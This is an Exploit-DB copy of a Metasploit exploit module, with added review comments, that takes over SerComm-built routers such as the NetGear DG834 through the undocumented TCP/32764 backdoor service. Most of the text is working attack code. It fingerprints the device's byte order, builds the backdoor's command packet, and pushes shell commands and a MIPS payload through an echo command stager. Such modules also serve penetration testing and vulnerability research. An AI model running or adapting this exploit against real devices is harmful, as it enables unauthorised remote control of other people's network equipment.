SerComm Device – Remote Code Execution (Metasploit)

  • 作者: Metasploit
    日期: 2014-01-14
  • 来源:https://www.exploit-db.com/exploits/30915/
    ##
    # This module requires Metasploit: http://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##
    
    require 'msf/core'
    
    # Metasploit exploit module for the undocumented management service that
    # several SerComm-built devices expose on TCP/32764 (the "TCP-32764"
    # backdoor in the references below). Two code paths: `check` fingerprints
    # the service by its reply banner, and `exploit` pushes the payload through
    # the echo-based command stager, which drives `execute_command` below.
    class Metasploit3 < Msf::Exploit::Remote
    Rank = GreatRanking
    
    # TCP socket helpers (connect / sock / disconnect) and the echo-based
    # command stager; the stager presumably calls execute_command below once
    # per staged chunk — confirm against Msf::Exploit::CmdStagerEcho.
    include Msf::Exploit::Remote::Tcp
    include Msf::Exploit::CmdStagerEcho
    
    # Module metadata: name, authorship, payload constraints, the two MIPS
    # targets (big and little endian), references and the default service port.
    #
    # @param info [Hash] metadata supplied by the framework, merged via update_info
    def initialize(info={})
    super(update_info(info,
    'Name' => "SerComm Device Remote Code Execution",
    'Description'=> %q{
    This module will cause remote code execution on several SerComm devices.
    These devices typically include routers from NetGear and Linksys.
    Tested against NetGear DG834.
    },
    'License'=> MSF_LICENSE,
    'Author' =>
    [
    'Eloi Vanderbeken <eloi.vanderbeken[at]gmail.com>', # Initial discovery, poc
    'Matt "hostess" Andreko <mandreko[at]accuvant.com>' # Msf module
    ],
    'Payload'=>
    {
    'Space' => 10000, # Could be more, but this should be good enough
    'DisableNops' => true
    },
    'Platform' => 'linux',
    'Privileged' => false,
    # Target selection is left to the user; `check` reports the detected
    # byte order but does not set the target.
    'Targets'=>
    [
    ['Linux MIPS Big Endian',
    {
    'Arch' => ARCH_MIPSBE
    }
    ],
    ['Linux MIPS Little Endian',
    {
    'Arch' => ARCH_MIPSLE
    }
    ],
    ],
    'DefaultTarget'=> 0,
    'References' =>
    [
    [ 'OSVDB', '101653' ],
    [ 'URL', 'https://github.com/elvanderb/TCP-32764' ]
    ],
    'DisclosureDate' => "Dec 31 2013" ))
    
    # Only the service port is configurable; 32764 is the port the service
    # listens on by default.
    register_options(
    [
    Opt::RPORT(32764)
    ], self.class)
    end
    
    # Vulnerability check: classifies the host as Vulnerable as soon as the
    # service answers the fingerprint probe with either known banner.
    # The detected endianness is only printed; it is not used to pick the
    # matching MIPS target.
    #
    # @return [Msf::Exploit::CheckCode] Vulnerable on a recognised banner,
    #   Unknown otherwise
    def check
    fprint = endian_fingerprint
    
    case fprint
    when 'BE'
    print_status("Detected Big Endian")
    return Msf::Exploit::CheckCode::Vulnerable
    when 'LE'
    print_status("Detected Little Endian")
    return Msf::Exploit::CheckCode::Vulnerable
    end
    
    # nil from endian_fingerprint: no reply, unrecognised banner, or connection error
    return Msf::Exploit::CheckCode::Unknown
    end
    
    # Delivers the payload through the echo command stager. The :noargs option
    # is passed straight through to the stager; see Msf::Exploit::CmdStager for
    # its meaning.
    def exploit
    execute_cmdstager(:noargs => true)
    end
    
    # Probes the service once: opens a connection, sends 5 random bytes, reads a
    # single reply and closes. The reply prefix identifies the device's byte
    # order ("MMcS" => big endian, "ScMM" => little endian). This short
    # request/response pair is what is observable on the wire, both for this
    # check and for anyone monitoring traffic to the port.
    #
    # NOTE(review): disconnect is not in an ensure block — an exception other
    # than Rex::ConnectionError raised between connect and disconnect leaves
    # the socket to the framework's cleanup.
    #
    # @return [String, nil] 'BE', 'LE', or nil when there is no recognisable
    #   reply or the connection fails (the error is printed, not raised)
    def endian_fingerprint
    begin
    connect
    
    sock.put(rand_text(5))
    # one read; the nil guard below covers an empty response
    res = sock.get_once
    
    disconnect
    
    if res && res.start_with?("MMcS")
    return 'BE'
    elsif res && res.start_with?("ScMM")
    return 'LE'
    end
    rescue Rex::ConnectionError => e
    print_error("Connection failed: #{e.class}: #{e}")
    end
    
    return nil
    end
    
    # Stager callback: sends one shell command to the service. The wire format
    # is a 12-byte header followed by the raw command text; no reply is read.
    #
    # @param cmd [String] shell command produced by the command stager
    # @param opts [Hash] stager options; unused here (presumably part of the
    #   callback signature the stager expects — confirm)
    # @return [void]
    def execute_command(cmd, opts)
    vprint_debug(cmd)
    
    # Get the length of the command, for the backdoor's command injection
    # NOTE(review): String#length counts characters, not bytes; the two agree
    # only for ASCII commands.
    cmd_length = cmd.length
    
    # 0x53634d4d=> Backdoor code
    # 0x07=> Exec command
    # cmd_length=> Length of command to execute, sent after communication struct
    # Three 32-bit unsigned little-endian ints ("V"), regardless of which
    # endianness target was selected; 0x53634d4d packs to the bytes "MMcS".
    data = [0x53634d4d, 0x07, cmd_length].pack("VVV")
    
    connect
    # Send command structure followed by command text
    sock.put(data+cmd)
    disconnect
    
    # Fixed pause after each command; nothing is read back from the service.
    Rex.sleep(1)
    end
    
    end